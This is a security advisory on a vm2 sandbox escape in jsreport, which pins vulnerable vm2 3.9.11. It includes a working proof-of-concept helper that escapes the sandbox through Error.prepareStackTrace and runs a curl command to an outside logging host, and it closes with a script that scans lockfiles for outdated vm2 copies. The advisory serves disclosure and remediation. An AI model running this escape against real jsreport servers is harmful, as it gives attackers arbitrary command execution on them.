CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.001 Low
Percentile: 26.7%
A few days ago, a sandbox escape vulnerability was found in the vm2 module for Node.js; it was officially fixed in v3.9.15.
However, a fixed vm2 version (v3.9.11) is hard-coded in the package.json of the jsreport-core component of jsreport, so the latest vm2 is never installed with it.
The relevant details and PoC of this sandbox escape are publicly available:
Testing on the official jsreport playground confirms that the vulnerability is present.
Playground workspace (with the PoC inside):
https://playground.jsreport.net/w/anon/f9agld17
The HTML content used to generate the PDF:
<style>
  th {
    font-size: 20px;
  }
  td, th {
    background-color: #abe81b;
    border: 3px solid #455bd0;
    padding: 10px;
    text-align: center;
  }
</style>
<table>
  <tr>
    <th>Name</th>
    <th>Age</th>
    <th>Job</th>
    <th>Random</th>
  </tr>
  {{#each people}}
  <tr>
    <td>{{name}}</td>
    <td>{{age}}</td>
    <td>{{job}}</td>
    <td>{{getRandom}}</td>
  </tr>
  {{/each}}
</table>
The JS helper that is called while generating the PDF:
function getRandom() {
  Error.prepareStackTrace = (e, frames) => {
    frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://zf2o8e.dnslog.cn');
  };
  (async ()=>{}).constructor('return process')()
  return Math.random()
}
Click the run button.
From the report log on the right, you can see that curl http://zf2o8e.dnslog.cn was executed and a DNS resolution error was thrown.
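The root cause on the jsreport side is a pinned transitive dependency: because jsreport-core hard-codes vm2 3.9.11, a project can have a patched vm2 at the top level and still carry a vulnerable nested copy under node_modules/jsreport-core. The following script is an added example (not jsreport's or vm2's own code) that walks a package-lock.json and reports every vm2 copy below the fixed release, 3.9.15. The lockfile contents are constructed for the example; the jsreport-core version in it is a placeholder, and the version comparison is a minimal numeric one that ignores prerelease suffixes.

```javascript
// Added example: find every copy of vm2 in a package-lock.json that is older
// than the fixed release. Nested copies matter because a dependency that pins
// its own vm2 (as jsreport-core pins 3.9.11) keeps that copy regardless of what
// the top-level project requests, so the scan must cover every node_modules path.

const FIXED_VM2 = '3.9.15';

// Compare two dotted version strings numerically, ignoring any prerelease or
// build suffix (enough for vm2's release numbering). Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Collect every { path, version } for the package `name` from a parsed
// package-lock.json. lockfileVersion 2/3 files carry a flat "packages" map keyed
// by path; lockfileVersion 1 files carry a nested "dependencies" tree. A v2
// file contains both, so prefer "packages" to avoid double counting.
function findPackage(lock, name) {
  const hits = [];
  if (lock.packages) {
    for (const [p, meta] of Object.entries(lock.packages)) {
      if (p === `node_modules/${name}` || p.endsWith(`/node_modules/${name}`)) {
        hits.push({ path: p, version: meta.version });
      }
    }
  } else if (lock.dependencies) {
    const walk = (deps, prefix) => {
      for (const [dep, meta] of Object.entries(deps)) {
        const p = `${prefix}node_modules/${dep}`;
        if (dep === name) hits.push({ path: p, version: meta.version });
        if (meta.dependencies) walk(meta.dependencies, `${p}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

// Return the vm2 copies whose version is below FIXED_VM2.
function vulnerableVm2(lock) {
  return findPackage(lock, 'vm2').filter(h => compareVersions(h.version, FIXED_VM2) < 0);
}

// Constructed sample lockfile (not from a real project): the root has a patched
// vm2, but jsreport-core carries its own pinned, vulnerable copy underneath it.
// The jsreport-core version is a placeholder; the page does not state it.
const SAMPLE_LOCK = {
  lockfileVersion: 2,
  packages: {
    '': { name: 'report-service', version: '1.0.0' },
    'node_modules/vm2': { version: '3.9.15' },
    'node_modules/jsreport-core': { version: '0.0.0-placeholder' },
    'node_modules/jsreport-core/node_modules/vm2': { version: '3.9.11' },
  },
};

for (const hit of vulnerableVm2(SAMPLE_LOCK)) {
  console.log(`vulnerable vm2 ${hit.version} at ${hit.path} (fixed in ${FIXED_VM2})`);
}
```

To run it against a real project, replace SAMPLE_LOCK with JSON.parse(fs.readFileSync('package-lock.json', 'utf8')); a non-empty result means an npm override (or an upgraded jsreport-core that no longer pins the old vm2) is still needed, even if the top-level vm2 is already patched.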